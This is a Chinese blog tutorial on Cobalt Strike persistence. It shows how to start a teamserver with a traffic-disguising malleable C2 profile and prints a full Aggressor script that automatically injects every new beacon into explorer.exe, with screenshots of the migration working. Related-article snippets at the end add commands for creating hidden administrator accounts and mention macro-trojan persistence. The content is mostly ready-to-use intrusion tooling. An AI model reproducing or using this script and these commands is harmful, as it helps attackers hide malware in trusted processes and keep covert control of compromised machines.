【渗透测试笔记】之【内网渗透——CS权限维持:CS上线后进程自迁移插件】

最新推荐文章于 2024-06-21 19:34:19 发布
最新推荐文章于 2024-06-21 19:34:19 发布
阅读量2.9k 收藏 8
点赞数 2
分类专栏: 渗透测试 Cobalt Strike 内网渗透 文章标签: 网络安全 渗透测试 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44874645/article/details/120956977
版权

文章目录

1. 服务端加载malleable配置文件

1.1 下载

下载地址:https://github.com/threatexpress/malleable-c2

下载cs对应版本配置文件:
在这里插入图片描述
我这里下载4.3版本的。

1.2 加载配置文件

下载完后放入CS根目录:
在这里插入图片描述
加载配置文件启动方式,只需要在末尾跟上配置文件就可以了:

./teamserver 192.168.8.48 aa8j jquery-c2.4.3.profile

在这里插入图片描述

2. 客户端加载cna插件

2.1 插件下载

下载地址:https://github.com/AA8j/SecTools/tree/main/CS/AutoProcessMigration

或者直接复制源码:

AutoProcessMigration.cna

on beacon_initial{
	sub callback{
		$regex = '(.*\n)+explorer.exe\t\d+\t(\d+)(.*\n)+';
		# 要迁移的进程
		$listener = "test";
		# 回连的监听器名字
		if ($2 ismatch $regex){
			$pid = matched()[1];
			$inject_pid = $pid;
			if (-is64 $1){
				$arch = "x64";
			}
			else{
				$arch = "x86";
			}
			binject($1, $pid, $listener, $arch);
		}
	}
	if($inject_pid != beacon_info($1,"pid")){
		bps($1, &callback);
	}
}

2.2 插件加载

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

3. 测试

创建监听器(注意:所有seesion的自迁移都会回连这个监听器):
在这里插入图片描述

生成cs马:
在这里插入图片描述
上线测试:
在这里插入图片描述
等待一会后成功自迁移到explorer.exe进程:
在这里插入图片描述

AA8j
关注
专栏目录
内网渗透-域内的权限维持
lza20001103的博客
10-01 1035
域内的权限维持 文章目录域内的权限维持前言PTTTGT(黄金票据)sspSkeleton KeySID History后记 前言 上期我们讲了windows和Linux中的权限维持,这期我们讲一下域内的权限维持权限维持是后渗透必不可少的环节,大家一定要好好掌握啊。 PTT PTT(票据) window认证机制 http://note.youdao.com/noteshare?id=cb8c505af1c38b461be8e964e9825dca&sub=F271F9DD1A894C4188D1AE
红队内网攻防渗透:内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 304
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
自动迁移
weixin_30736301的博客
04-29 486
protected void Application_Start() { //Enable-Migrations //每次都删除数据库再重建 System.Data.Entity.Database.SetInitializer( new System.Data.Entity.Dro...
CobaltStrike4.8渗透工具cs下载(有手就会版)
最新发布
2301_79316009的博客
06-21 867
ls -l看teamserver权限,像我这个图就是已经 chmod加权 过了。也可以ctrl+x(x点五下)强制退出rz命令,但是偶尔对文件有损失。小白白,刚上手一般会忘记开端口号50050,而导致客户端会连接超时。3.请求特征:下发的指令,url路径,老版本固定的ua头。这里只需要给予teamserver文件执行权限即可。上传成功后等待一会儿,就会自动取消rz命令的执行。3.2.1给予teamserver文件的权限。如果进行二开魔改后的cs,可提取样本。3.2.2 运行服务端。
CS插件——CobaltStrike_CNA-权限维持
2301_76786857的博客
12-08 1657
EasyPersistent,是一个用于windows系统上权限维持的Cobalt Strike CNA 脚本。脚本整合了一些常用的权限维持方法,使用反射DLL模块可使用API对系统服务、计划任务等常见权限维持方法进行可视化操作(强烈建议使用白名单进程进行操作)。
权限维持
weixin_43999372的博客
05-28 1585
windows 权限维持 一 修改注册表建立隐藏用户 一.环境 windows 2007 CMD命令行下,建立了一个用户名为“test”,密码为test的用户,并加入管理员组,cMD命令行使用"netuser",看不到"test”,密码为test的用户,并加入管理员组 ,cMD命令行使用"net user
Windows权限维持技术总结、复现
leah126的博客
03-13 946
的作用是指定用户登录时 Winlogon 运行的程序。默认情况下,Winlogon 运行 Userinit.exe(运行登录脚本),重新建立网络连接,然后启动 Windows 用户界面 Explorer.exe。可以更改此条目的值以添加或删除程序。例如,要在 Windows 资源管理器用户界面启动之前运行某个程序,可以将该程序的名称替换为该条目的值中的 Userinit.exe,然后在该程序中包含启动 Userinit.exe 的指令。在 Windows 上有一个重要的机制,也就是服务。
红队专题-内网横向-工作组Workgroup与 Domain Active Directory域渗透
aming小老弟
12-21 1267
通过使用活动目录,管理员能够中心化、批量地更新和管理操作系统、应用、用户以及对数据的访问,而用户和管理员也能很容易地获取这些信息。而且因为活动目录具备中心化的管理能力,攻击者一旦获得域管理员权限,即可控制域内所有用户和主机,因此活动目录域环境也备受攻击者青睐。实际上LSA保护不能抵御这些攻击,它只会让你在执行这些攻击前,需要一些额外的操作,让攻击变得更加困难一些。此功能基于PPL技术,它是一种纵深防御的安全功能,旨在“防止非管理员非PPL进程通过打开进程之类的函数串改PPL进程的代码和数据”。
2021-10-074号靶场转自y神的学习笔记(net渗透,sockcap,msf多重网段渗透,os-shell,验证码重放,C#解密,wfuzz穷举subdomain)
qq_45290991的博客
10-07 2564
masscan扫描 kali@kali:~$ sudo masscan -p 1-65535 192.168.0.134 --rate=1000 [sudo] kali 的密码: Starting masscan 1.0.5 (http://bit.ly/14GZzc...
HCNA笔记
weixin_42517976的博客
12-16 3077
@恋爱交换机 HCNA 笔记 在空闲的时间里去笔记 eNSP及VRP基础操作 1.1 熟悉VRP基本操作 最初配置 Sysname //名字修改名字 clock datetime 00:00:00 2018-07-28 //设置路由时钟 clock timezone BJ add 08:00:00 //设置时区 header login information“HELLO” // 设置...
WMI ——重写版
Ms08067安全实验室
08-10 992
本文作者:伍默(内网知识星球学员)本文是以WMI的重写版,本来这份笔记会更长,原版的笔记以Black Hat 2015的Abusing Windows Management Instru...
内网权限维持
m0_55751267的博客
11-22 1802
事实上在该过程中,Windows还会在注册表的上述路径中查询所有的映像劫持子键,如果存在和该程序名称完全相同的子键,就查询对应子健中包含的“Dubugger”键值名,并用其指定的程序路径来代替原始的程序,之后执行的是遭到“劫持”的虚假程序。管理员权限的后门可以设置更多的计划任务,例如重启后运行等。Run中的程序是WINDOWS初始化后才运行的,而RunService中的程序是在操作系统启动时就开始运行的,也就是说RunServices中的程序先于Run中的程序运行,如电源管理程序。反弹管理员shell。
35. Metasploit后渗透攻击:Meterpreter进程迁移
__Qian的博客
03-17 4046
1. Meterpreter优势: a. 纯内存工作模式,不需要对磁盘进行任何写入操作; b. 使用加密通信协议,而且可以同时与几个信道通信; c. 在被攻击进程内工作,不需要创建新的进程; d. 易于在多进程之间迁移; e. 平台通用,适用于Windows、Linux、BSD系统,并支持Intel x86和Intel x64平台 2.Meterpreter进程迁移 在刚获得的Meterpre...
process migration(进程迁移) 学习笔记
风一样的安姑娘的专栏
12-14 3381
检查点算法一般分为2种:非协调式和协调式。 在非协调的检查点算法中,每个进程可独立决定保存自己状态的时刻,缺点是易产生多米诺效应幔。每个进程需要维护多个检查点文件,浪费大量已进行的工作和大量存储空间。 在协调检查点算法中,要求多个进程协同地设置检查点,以获得一致的全局状态,避免多米诺效应,而且它只需要每个进程在稳定存储七维护一个永久性检查点,降低了存储开销。 基于检查点和消息日志的同卷恢复容
windows 权限维持
weixin_52263461的博客
01-20 276
添加影子用户 影子用户顾名思义就是一个隐藏用户,只能通过注册表查看这个用户,其它方式是找不到这个用户的信息的。在用户名后面添加$可以创建匿名的用户再添加到管理员组。 Net user看不到用户,但是在计算机管理里面还是可以看的到。 创建普通账号 net user huahua 123456 /add net localgroup administrators huahua /add (将用户加入组) 创建隐藏账户 net user huahua$ 123456 /add net user 查看
权限维持新老技术
热门推荐
Shanfenglan's blog
08-04 34万+
参考资料 权限维持相关 静默宏木马 可以使用静默宏木马进行权限维持。利用cs创建宏木马插入docx文件中。 制作方法 1.利用CS生成vbs代码 2.创建一个docx文档并创建宏且将宏的位置设置为对所有的活动模版和文档,如下图所示 3.将恶意vbs代码加入到Nomal的This Document模块 4.保存文件并运行,主机上线,且以后这个电脑上的任意word文档打开后都会上线,除非删掉这个宏配置。 tips 杀软对doc文件杀软查杀力度远大于对docx文件的。 参考 静默宏木马进行
后渗透阶段的权限维持
Fly_鹏程万里
08-22 2609
前言 当我们在渗透过程中通过漏洞获取到目标主机权限后,往往会因为服务器管理员发现和修补漏洞而导致对服务器权限的丢失,所以权限维持就显得很重要了。 在windows主机中,我总结了下面几种权限维持的方法,不足之处还望各位大佬斧正。 添加影子账户 影子账户可以理解为和主体一模一样但是又看不见的账户,其隐蔽性较好,只能在注册表里面看到。 首先,我们需要创建一个隐藏账号OMG$ 使用命令 net...
CobalStrike批量上线后的权限维持和信息收集~
Ms08067安全实验室
01-11 910
出品|MS08067实验室本文作者:BlackCat(Ms08067内网安全小组成员)BlackCat微信(欢迎骚扰交流):前言:昨天CS批量上线的时候发现,内网渗透的本质都是信息收集...
Metasploit技术(四)——进程迁移
Phantom03167的博客
04-11 4989
后渗透攻击 进程迁移
BackTrack渗透测试实战教程:学习笔记与Metasploit详解
"BackTrack渗透测试学习笔记是一份由IceSn0w编写的教程,旨在帮助读者深入了解和学习BackTrack在渗透测试中的应用。BackTrack是一款著名的开源网络安全工具集,主要用于进行渗透测试网络安全评估。该笔记并非专业...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值